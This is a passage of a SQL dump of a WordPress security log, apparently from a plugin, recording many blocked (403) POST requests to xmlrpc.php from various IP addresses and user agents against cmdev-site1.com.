Safari\\/537.36\"}','tPkSYw4mce1zMfUyjNnrLAOR',0,1681750023.1837,609,'','POST',403,0,515,0,1,'',0),('103.147.130.161',1737720481,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/88.0.4324.190 Safari\\/537.36\"}','kZChAgeuWqs6HjY9D3lKdizr',0,1681750017.1973,1290,'','POST',403,0,515,0,1,'',0),('103.42.56.253',1730820349,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko\\/20100101 Firefox\\/41.0\"}','BlKkH4VcdJrfTv6X2ZQwGe3S',0,1681750016.4799,1807,'','POST',403,0,515,0,1,'',0),('194.187.251.163',3267099555,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','n8wDeHfvcrCSN2zEMaAd7WJo',0,1681749920.3820,4933,'','POST',403,0,515,0,1,'',0),('82.102.23.139',1382422411,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','L0r5zUIpToPlEMnfZ7ueNRaF',0,1681748320.8187,561,'','POST',403,0,515,0,1,'',0),('82.102.23.131',1382422403,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','Q6TdJRfE8eUcoSKkNpzg5WLh',0,1681748268.4451,4082,'','POST',403,0,515,0,1,'',0),('103.130.219.197',1736629189,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.90 Safari\\/537.36\"}','FKinTItaYCuMPpw1h3SrmBkL',0,1681758457.3168,698,'','POST',403,0,515,0,1,'',0),('81.88.53.58',1364735290,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:62.0) Gecko\\/20100101 Firefox\\/62.0\"}','QBHXzCe26RtO9nNGLAkJPuvs',0,1681758451.7420,944,'','POST',403,0,515,0,1,'',0),('185.2.5.90',3103917402,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/78.0.3904.108 Safari\\/537.36\"}','HBIR1jSwad0Fzil3ANQ7qoDx',0,1681758448.2357,4011,'','POST',403,0,515,0,1,'',0),('194.36.111.59',3257167675,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','RXm79hktTbNy0YHvBqMra6ip',0,1681758047.0139,1389,'','POST',403,0,515,0,1,'',0),('134.19.179.235',2249438187,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','Vi5YxKtmH02bhWrPODBEXNCc',0,1681757929.1446,742,'','POST',403,0,515,0,1,'',0),('104.254.90.187',1761499835,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','vzOFBZnts0I65eEcduW1Tf8h',0,1681756458.4375,1555,'','POST',403,0,515,0,1,'',0),('184.75.221.35',3091979555,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','SRm4Cpf7quchlyXU1rHjLIOF',0,1681755978.9072,1818,'','POST',403,0,515,0,1,'',0),('103.42.56.253',1730820349,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/74.0.3729.157 Safari\\/537.36\"}','marBofA14XhRWSGiuyCT62Ot',0,1681762704.9551,1597,'','POST',403,0,515,0,1,'',0),('50.62.137.47',842959151,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/90.0.4430.212 Safari\\/537.36\"}','MJGwI4otxEavcPjqBih7VfyU',0,1681762702.6756,4007,'','POST',403,0,515,0,1,'',0),('103.101.161.81',1734713681,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:47.0) Gecko\\/20100101 Firefox\\/47.0\"}','XVq9FCxoU05SbDfkjm4nRTZh',0,1681766927.6248,581,'','POST',403,0,515,0,1,'',0),('128.199.67.142',2160542606,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.88 Safari\\/537.36\"}','2xRWI6syjSrqDGBv0etzL3lA',0,1681766921.6494,1227,'','POST',403,0,515,0,1,'',0),('5.255.98.122',100622970,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:36.0) Gecko\\/20100101 Firefox\\/36.0\"}','6RNqtGmU2yFEinscC5BlkfPV',0,1681766921.3053,1381,'','POST',403,0,515,0,1,'',0),('219.94.129.200',3680403912,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.88 Safari\\/537.36\"}','S34zt5GJBscrRpV7NAKTXOED',0,1681766918.5048,585,'','POST',403,0,515,0,1,'',0),('202.61.232.109',3393054829,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/67.0.3396.99 Safari\\/537.36\"}','rESkWftZjDVgRA0Jdx3BY4uh',0,1681766917.7751,593,'','POST',403,0,515,0,1,'',0),('47.107.237.174',795602350,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.149 Safari\\/537.36\"}','5zu6T1lJjfMDsR2nSaXPi4pC',0,1681766911.4454,571,'','POST',403,0,515,0,1,'',0),('74.208.233.41',1255205161,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:54.0) Gecko\\/20100101 Firefox\\/54.0\"}','h0idXJkLTWbKpEg5uBUj1zQ7',0,1681766910.6762,607,'','POST',403,0,515,0,1,'',0),('185.110.66.2',3111010818,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Safari\\/537.36\"}','gFYsQBWkwTzp3CjrGNaPn6I4',0,1681766904.2274,584,'','POST',403,0,515,0,1,'',0),('77.68.6.56',1296303672,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:78.0) Gecko\\/20100101 Firefox\\/78.0\"}','97jO1bzwRqXVlHFm6vYQciMu',0,1681766903.1530,593,'','POST',403,0,515,0,1,'',0),('103.130.219.197',1736629189,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko\\/20050716 Firefox\\/1.0.6\"}','sJq8CP6nEVbgz5eM0pHWkSRO',0,1681766894.8783,738,'','POST',403,0,515,0,1,'',0),('103.101.161.81',1734713681,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/70.0.3538.102 Safari\\/537.36\"}','DNXvjonVTBP4RKsW76eui51c',0,1681766894.1369,649,'','POST',403,0,515,0,1,'',0),('92.205.53.115',1556952435,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.105 Safari\\/537.36\"}','dkSwKTIOlLyHA38mRheaBpcv',0,1681766805.6847,1135,'','POST',403,0,515,0,1,'',0),('82.65.248.18',1380055058,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Safari\\/537.36\"}','qRoIPShGjFtsZCfNb4H3gra6',0,1681766805.2736,1204,'','POST',403,0,515,0,1,'',0),('68.178.228.199',1152574663,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (X11; Ubuntu; Linux i686; rv:24.0) Gecko\\/20100101 Firefox\\/24.0\"}','Ssh2IDRwAjvafPX3nBpHE61Z',0,1681766795.1491,691,'','POST',403,0,515,0,1,'',0),('138.186.9.114',2327447922,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 10; LM-X420) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/91.0.4472.114 Mobile Safari\\/537.36\"}','mIKkVj3BcTdfHtivh5PbqMRs',0,1681766794.5205,767,'','POST',403,0,515,0,1,'',0),('14.225.192.104',249675880,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:78.0) Gecko\\/20100101 Firefox\\/78.0\"}','g4Rn90s1jQLBypkorOYAxuVw',0,1681766790.5697,642,'','POST',403,0,515,0,1,'',0),('148.66.145.137',2487390601,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/65.0.3325.181 Safari\\/537.36\"}','V1QOnsKodvSqkra90Ujc3JfN',0,1681766780.7531,1268,'','POST',403,0,515,0,1,'',0),('34.87.13.139',576130443,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko\\/20100101 Firefox\\/88.0\"}','SW2pah0trlvOVu7cTI9DGnq4',0,1681766778.2325,3240,'','POST',403,0,515,0,1,'',0),('182.50.151.70',3056768838,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:84.0) Gecko\\/20100101 Firefox\\/84.0\"}','dM8kIJ3sO2iUmVj4QWqR10Se',0,1681780672.0005,645,'','POST',403,0,515,0,1,'',0),('185.208.182.231',3117463271,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.102 Safari\\/537.36\"}','f6MtmiVavRrUYXNG0H8PC5l7',0,1681780665.5506,616,'','POST',403,0,515,0,1,'',0),('92.205.2.176',1556939440,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko\\/20100101 Firefox\\/57.0\"}','zEVYxTZUneCkcFLomsAXlG6P',0,1681780660.8790,675,'','POST',403,0,515,0,1,'',0),('103.146.176.238',1737666798,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.1 (KHTML, like Gecko) Chrome\\/21.0.1180.83 Safari\\/537.1\"}','nS9WawT1t8E6lkb5Cd2PUmyi',0,1681780658.6941,590,'','POST',403,0,515,0,1,'',0),('148.66.145.137',2487390601,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/61.0.3163.100 Safari\\/537.36\"}','FzUJd25he9Dt0HmSC4XgxnVr',0,1681780653.0663,636,'','POST',403,0,515,0,1,'',0),('213.152.161.10',3583549706,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','Oa9gcQRr83NYCGwbPXqmJedl',0,1681773922.4967,3554,'','POST',403,0,515,0,1,'',0),('213.152.186.40',3583556136,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','4WAdNFhxwOi2IeBRG9YPMElu',0,1681772718.2095,3591,'','POST',403,0,515,0,1,'',0),('109.207.78.166',1842302630,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko\\/20100101 Firefox\\/29.0\"}','nOQZGp3D4Td9xb70Ak8Irqcy',0,1681780652.2478,643,'','POST',403,0,515,0,1,'',0),('189.203.144.160',3184234656,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/72.0.3626.121 Safari\\/537.36\"}','HNbo2eIMJwmqdyxz4RY1ZUT3',0,1681780647.9306,637,'','POST',403,0,515,0,1,'',0),('94.182.178.53',1589031477,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/89.0.4389.90 Safari\\/537.36\"}','mV12XDjARni8O5xUlt3vSsfp',0,1681780645.3329,770,'','POST',403,0,515,0,1,'',0),('219.94.129.200',3680403912,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 5.1; rv:30.0) Gecko\\/20100101 Firefox\\/30.0\"}','cK5JUyChDkL6lNdmOQziIEZ8',0,1681777966.0092,626,'','POST',403,0,515,0,1,'',0),('209.236.124.38',3521936422,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.88 Safari\\/537.36\"}','CxX2t9KkSVsuR6y8QIpOroHJ',0,1681777960.9052,571,'','POST',403,0,515,0,1,'',0),('103.130.219.197',1736629189,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64; rv:54.0) Gecko\\/20100101 Firefox\\/54.0\"}','Hh4O6C3BuFiKZlXMobTdRsec',0,1681777957.8802,676,'','POST',403,0,515,0,1,'',0),('103.117.180.72',1735767112,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Macintosh; Intel Mac OS X 10_10; rv:33.0) Gecko\\/20100101 Firefox\\/33.0\"}','HtFVws6NqZBPGR7lpEkzeQb9',0,1681777939.8932,670,'','POST',403,0,515,0,1,'',0),('82.165.88.176',1386567856,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:58.0) Gecko\\/20100101 Firefox\\/58.0\"}','WsI2CbwrghO9ycefHjDqnQa8',0,1681777934.6706,973,'','POST',403,0,515,0,1,'',0),('91.225.138.200',1541507784,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/60.0.3112.90 Safari\\/537.36\"}','twXCGYsiVWkpDoZJEO45a7A0',0,1681777933.9959,1051,'','POST',403,0,515,0,1,'',0),('103.148.15.211',1737756627,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko\\/20100101 Firefox\\/65.0\"}','G50tDjziUFKQcWmMdwVxurkb',0,1681777924.1888,3772,'','POST',403,0,515,0,1,'',0),('103.221.223.238',1742594030,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/72.0.3626.121 Safari\\/537.36\"}','3fXZnHvKsEQg9Rj4VmxaCJy7',0,1681777926.0386,1720,'','POST',403,0,515,0,1,'',0),('199.241.137.45',3354495277,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko\\/20100101 Firefox\\/40.1\"}','H5SyXfZx81QuoTFR67tIdrzP',0,1681786322.4811,4272,'','POST',403,0,515,0,1,'',0),('52.17.35.34',873538338,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/74.0.3729.157 Safari\\/537.36\"}','OEB8qGybTPY6piuHIotx4DZs',0,1681786325.2562,1440,'','POST',403,0,515,0,1,'',0),('50.62.137.47',842959151,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.0; rv:34.0) Gecko\\/20100101 Firefox\\/34.0\"}','1Y3qRSyWOLJPMUoAXlHINm5c',0,1681790735.3089,4464,'','POST',403,0,515,0,1,'',0),('114.215.128.253',1926725885,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/80.0.3987.149 Safari\\/537.36\"}','Wym7J6TfUIV1MHYQqd483BKG',0,1681789862.6742,809,'','POST',403,0,515,0,1,'',0),('176.56.56.133',2956474501,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/86.0.4240.198 Safari\\/537.36\"}','vu4Rn2ETHiMwaX38cLVPtCqy',0,1681789861.5860,1354,'','POST',403,0,515,0,1,'',0),('198.54.120.17',3325458449,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (iPhone; CPU iPhone OS 14_6 like Mac OS X) AppleWebKit\\/605.1.15 (KHTML, like Gecko) CriOS\\/91.0.4472.80 Mobile\\/15E148 Safari\\/604.1\"}','r8dygNe7cpShOb1nDquvkjAJ',0,1681789857.5021,4577,'','POST',403,0,515,0,1,'',0),('178.62.105.205',2990434765,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/61.0.3163.100 Safari\\/537.36\"}','MWpPnAB2ic56FELNJGO1zqeg',0,1681787222.4961,606,'','POST',403,0,515,0,1,'',0),('207.180.207.149',3484733333,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.88 Safari\\/537.36\"}','gPpqr8bu4RaY1wBUml3v9Czj',0,1681787209.2709,604,'','POST',403,0,515,0,1,'',0),('208.109.65.254',3496821246,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.1 (KHTML, like Gecko) Chrome\\/21.0.1180.83 Safari\\/537.1\"}','om29eQOj0kncdxLZDhGNPCly',0,1681787204.0584,625,'','POST',403,0,515,0,1,'',0),('160.153.155.29',2694421277,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/74.0.3729.131 Safari\\/537.36\"}','lBh2Ve8jUADZW13GLzPOFbN9',0,1681787194.8412,631,'','POST',403,0,515,0,1,'',0),('103.101.161.81',1734713681,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/85.0.4183.121 Safari\\/537.36\"}','goqfCr0j1x3kXsiW6Q5KJyIN',0,1681787191.0337,575,'','POST',403,0,515,0,1,'',0),('81.88.53.58',1364735290,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/88.0.4324.104 Safari\\/537.36\"}','SY0OlLkPR8m37saeDVEoMJqi',0,1681787179.4631,3519,'','POST',403,0,515,0,1,'',0),('159.89.102.74',2673436234,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/74.0.3729.169 Safari\\/537.36\"}','sVcGznIrSmgiTDh69vtWl7qC',0,1681804849.8490,621,'','POST',403,0,515,0,1,'',0),('5.9.59.22',84491030,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.88 Safari\\/537.36\"}','i4ARnpeJGdCTj5Y8hU3IkHwD',0,1681804844.9319,596,'','POST',403,0,515,0,1,'',0),('122.201.124.60',2060024892,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko\\/20100101 Firefox\\/85.0\"}','s9xHgO2q8cQr0RedS1vDJIia',0,1681804839.8171,1499,'','POST',403,0,515,0,1,'',0),('184.75.221.211',3091979731,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','Mtsm0N83CuRgFTb6h4V1vSwL',0,1681804305.9713,1351,'','POST',403,0,515,0,1,'',0),('183.181.91.159',3082115999,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:58.0) Gecko\\/20100101 Firefox\\/58.0\"}','xMEhrZ7mNnt9T8HFU3jSdVIv',0,1681804056.4719,613,'','POST',403,0,515,0,1,'',0),('61.221.35.29',1037902621,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:63.0) Gecko\\/20100101 Firefox\\/63.0\"}','JfeAh6UMOTZBl1zLH8FrwRgk',0,1681804044.3663,1479,'','POST',403,0,515,0,1,'',0),('47.243.171.230',804498406,'','http://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/63.0.3239.132 Safari\\/537.36\"}','2j5nzVbtIUGRi1FA4ZuDX7fm',0,1681804041.1211,4174,'','POST',403,0,515,0,1,'',0),('103.147.130.161',1737720481,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64) AppleWebKit\\/537.1 (KHTML, like Gecko) Chrome\\/21.0.1180.83 Safari\\/537.1\"}','gIWxms0TuAL5oJ1B7heSVbXy',0,1681802465.4196,712,'','POST',403,0,515,0,1,'',0),('68.178.228.199',1152574663,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 6.0.1; RedMi Note 5 Build\\/RB3N5C; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/68.0.3440.91 Mobile Safari\\/537.36\"}','muRos9SinaTMI76eG3hK1rFq',0,1681802459.3100,768,'','POST',403,0,515,0,1,'',0),('34.87.13.139',576130443,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/69.0.3497.100 Safari\\/537.36\"}','0emNnjPdV7QYtCOL6lrcsGUZ',0,1681802450.4686,2744,'','POST',403,0,515,0,1,'',0),('185.2.5.88',3103917400,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:59.0) Gecko\\/20100101 Firefox\\/59.0\"}','voagWX9B5kR6sqpZYIJHCbTj',0,1681802456.1468,691,'','POST',403,0,515,0,1,'',0),('34.87.13.139',576130443,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.117 Safari\\/537.36\"}','5sMZedzP2aY4Au8f0oWk1HFn',0,1681802450.5129,2699,'','POST',403,0,515,0,1,'',0),('103.146.176.238',1737666798,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/74.0.3729.169 Safari\\/537.36\"}','9SsiCOqcjGV7uX3vN2M4fYTQ',0,1681802447.5275,798,'','POST',403,0,515,0,1,'',0),('18.143.59.240',311376880,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/87.0.4280.88 Safari\\/537.36\"}','aMghRQ0ot6wJxpUPD58Ss2YE',0,1681802437.2411,1434,'','POST',403,0,515,0,1,'',0),('31.172.80.82',531386450,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/64.0.3282.186 Safari\\/537.36\"}','s8ecHipIgkdmb1Y5nRLTaM0j',0,1681802437.3720,1299,'','POST',403,0,515,0,1,'',0),('103.146.176.238',1737666798,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; WOW64; rv:42.0) Gecko\\/20100101 Firefox\\/42.0\"}','9wahDEQXLl7crSeJBKuMNfgb',0,1681802424.4353,616,'','POST',403,0,515,0,1,'',0),('51.132.254.35',864353827,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/69.0.3497.100 Safari\\/537.36\"}','umoiSP4hwaYDGx3BRf2N9JFT',0,1681802414.5613,1609,'','POST',403,0,515,0,1,'',0),('101.32.190.143',1696644751,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/70.0.3538.102 Safari\\/537.36\"}','uPh4MXOAzSGYq67JIwFgBHnK',0,1681802410.5979,4690,'','POST',403,0,515,0,1,'',0),('184.75.221.59',3091979579,'','https://cmdev-site1.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','L23cUOXBnCWuDPfkpeqzbJIv',0,1681814105.1312,1336,'','POST',403,0,515,0,1,'',0),('31.172.80.82',531386450,'','http://cmdev-site1.com.corridormediadesign.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows 